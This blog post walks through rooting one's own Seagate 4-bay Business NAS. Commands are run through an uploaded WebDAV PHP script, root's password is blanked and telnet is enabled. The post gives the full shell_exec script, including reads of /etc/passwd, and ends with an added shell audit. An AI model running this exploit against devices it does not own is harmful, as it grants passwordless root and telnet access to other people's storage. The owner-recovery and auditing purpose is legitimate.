Before we begin:

The information in this post is presented as-is for educational purposes only and comes WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. If you break your NAS you get to keep all the pieces! I accept no responsibility whatsoever for what you do with this information.

So I had a little run-in with my Seagate 4-bay Business NAS. Fed up with the lack of error messages or logging, I decided to look into getting shell access on the device so that I could properly diagnose the problem. The problem was that most information out there is outdated. It is an old device after all. The best lead I could find was this article as preserved by the Internet Archive. But would the approach still hold with the latest firmware?

Apparently security isn’t high on the list for this product range, because with the latest firmware version 2015.00330 I could still use this rather simple vector of attack.

In summary:

  1. (optional) Get the NAS in a state where you can modify settings through the web-based admin interface. In my case I had to boot the NAS and quickly disable the media server.
  2. Set up a share with anonymous WebDAV access. (A named user should work, but I prefer to eliminate any complexities when debugging a system)
  3. Save a PHP script in the root of this share, let’s say shell.php for this example. See below for my interpretation of the initial approach.
  4. Run the script by accessing http://YOUR_NAS_IP/shares/YOUR_WEBDAV_SHARE/shell.php. Even with firmware 2015.00330 the script will execute and run as root, which is rather sloppy to say the least.
  5. Use this mechanism to modify both /etc/passwd (to create a passwordless root user so that you can execute a ‘su -’ when you login over telnet) and /etc/inetd.conf (to enable the telnet service).
  6. Finally run /usr/sbin/inetd to activate the telnet service.

Once you have telnet running, you can log on with the credentials for a regular user. A ‘su -’ with the admin credentials will get you a root shell.

As opposed to the original article, I decided to forgo passing HTTP GET parameters to the NAS’ shell and instead build up a PHP script with individual shell_exec commands. This way I would get a repeatable result.

The final result is posted below. As-is, it will only output a few basic facts about your running system. If you decide to use it on your own NAS, you need to modify this script for yourself by uncommenting the lines that use sed to alter /etc/passwd and /etc/inetd.conf. Furthermore, you need to uncomment the line that starts inetd. After that, only run the script once. Delete it from the share afterwards to be on the safe side…

<html>
    <head>
        <meta charset="utf-8">
    </head>
    <body>
    <h1>Notice</h1>
<p> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
</p>
<pre>

<?php

echo "------------------WHOAMI------------------------\n";
echo shell_exec('whoami');

echo "------------------df -h------------------------\n";
echo shell_exec('df -h');

echo "------------------ls /------------------------\n";
echo shell_exec('ls /');

echo "------------------ls /etc------------------------\n";
echo shell_exec('ls /etc');

echo "------------------ls /etc/init.d------------------------\n";
echo shell_exec('ls /etc/init.d');

echo "------------------du /var------------------------\n";
echo shell_exec('du -h /var');

echo "------------------cat /etc/passwd------------------------\n";
echo shell_exec('cat /etc/passwd');

echo "------------------cat /etc/inetd.conf------------------------\n";
echo shell_exec('cat /etc/inetd.conf');

# THE BUSINESS END...
# If you are confident that /etc/passwd and /etc/inetd.conf are compatible with these sed commands, you can uncomment them.
# WARNING Enabling these lines is at your own risk. If you enable these lines, only run the script once (or you'll append telnet multiple times to /etc/inetd.conf).

echo "------------------sed -i s/root:x:0:0:root:/root::0:0:root:/g /etc/passwd------------------------\n";
#echo shell_exec('sed -i s/root:x:0:0:root:/root::0:0:root:/g /etc/passwd');

echo "------------------cat /etc/passwd------------------------\n";
echo shell_exec('cat /etc/passwd');


echo "------------------sed -i '$ a telnet		stream	tcp	nowait	root	/usr/sbin/telnetd	/usr/sbin/telnetd' /etc/inetd.conf------------------------\n";
#echo shell_exec("sed -i '$ a telnet		stream	tcp	nowait	root	/usr/sbin/telnetd	/usr/sbin/telnetd' /etc/inetd.conf");

echo "------------------cat /etc/inetd.conf------------------------\n";
echo shell_exec('cat /etc/inetd.conf');

echo "------------------/usr/sbin/inetd------------------------\n";
#echo shell_exec('/usr/sbin/inetd');

?>

</pre>
</body></html>
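
To check a NAS for the two changes the script above makes (a root entry with an empty password field in /etc/passwd and an active telnet line in /etc/inetd.conf), an audit along these lines can be run from a shell. It is an added example, not part of the original post; the function names are made up for illustration, and the file paths default to the ones named above.

```shell
#!/bin/sh
# Added audit example (not from the original post). Function names are
# hypothetical; paths can be overridden to audit copies of the files.

# Print UID-0 accounts in a passwd-format file whose password field is empty.
empty_root_accounts() {
    awk -F: '$3 == 0 && $2 == "" { print $1 }' "$1"
}

# Print active (non-comment) inetd.conf entries for the telnet service,
# or any entry whose server program is a telnetd binary.
telnet_inetd_entries() {
    awk '!/^[ \t]*#/ && NF >= 6 && ($1 == "telnet" || $6 ~ /telnetd$/) { print }' "$1"
}

# Report findings; return 0 when clean, 1 when either finding is present.
audit_nas() {
    passwd_file=${1:-/etc/passwd}
    inetd_file=${2:-/etc/inetd.conf}
    status=0

    accounts=$(empty_root_accounts "$passwd_file")
    if [ -n "$accounts" ]; then
        echo "FINDING: UID 0 account(s) with empty password in $passwd_file:"
        echo "$accounts"
        status=1
    fi

    if [ -r "$inetd_file" ]; then
        entries=$(telnet_inetd_entries "$inetd_file")
        if [ -n "$entries" ]; then
            echo "FINDING: telnet enabled in $inetd_file:"
            echo "$entries"
            status=1
        fi
    fi
    return $status
}
```

Source the file and call audit_nas with no arguments on the device itself, or pass the paths of copied files as the first and second argument.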
